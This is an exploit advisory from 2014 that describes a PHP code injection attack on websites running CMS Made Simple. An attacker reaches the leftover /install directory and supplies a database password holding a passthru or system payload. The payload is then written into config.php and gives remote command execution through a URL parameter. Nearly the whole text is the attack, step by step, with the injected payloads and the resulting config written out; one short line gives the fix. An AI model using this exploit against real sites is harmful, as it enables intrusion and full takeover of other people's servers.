# CMS Made Simple PHP Code Injection Vulnerability (All versions) # 2014-12-02 # sahm (@post.com) # cmsmadesimple.org # All versions ---exploit A malicious attacker can intrude every CMSMS-installed website by taking the following steps: Open the /install folder from the URL (The cms doesn't force users to delete the directory after finishing the installation progress). Ex: http://URL/PATH/install Pass through the steps to get to the fifth step. In a remote host, install a MySQL server and create the following user: user: test password : '.passthru($_GET['command']);exit;// Following that, Create a remotely accessible database and grant all privileges to the user (for further information please read : http://www.cyberciti.biz/tips/how-do-i-enable-remote-access-to-mysql-database-server.html) . Fill in the Database Information form (bottom of the page). db host address: the remote host's IP user: test password: '.system($_GET['command']);exit;// database name: the name of the remote database which has been built After installation, commands can be injected as: http://URL/PATH?command=blah%20blah ---prove At this point, the config.php file content would be something like this: <?php # CMS Made Simple Configuration File # Documentation: /doc/CMSMS_config_reference.pdf # . . . $config['db_username'] = 'test'; $config['db_password'] = ''.passthru($_GET['command']);exit;//'; $config['db_name'] = 'test'; . . . ?> ---patch Although there are a variety of actions which can be taken to patch the bug, the must rational one would be to remove the /install directory.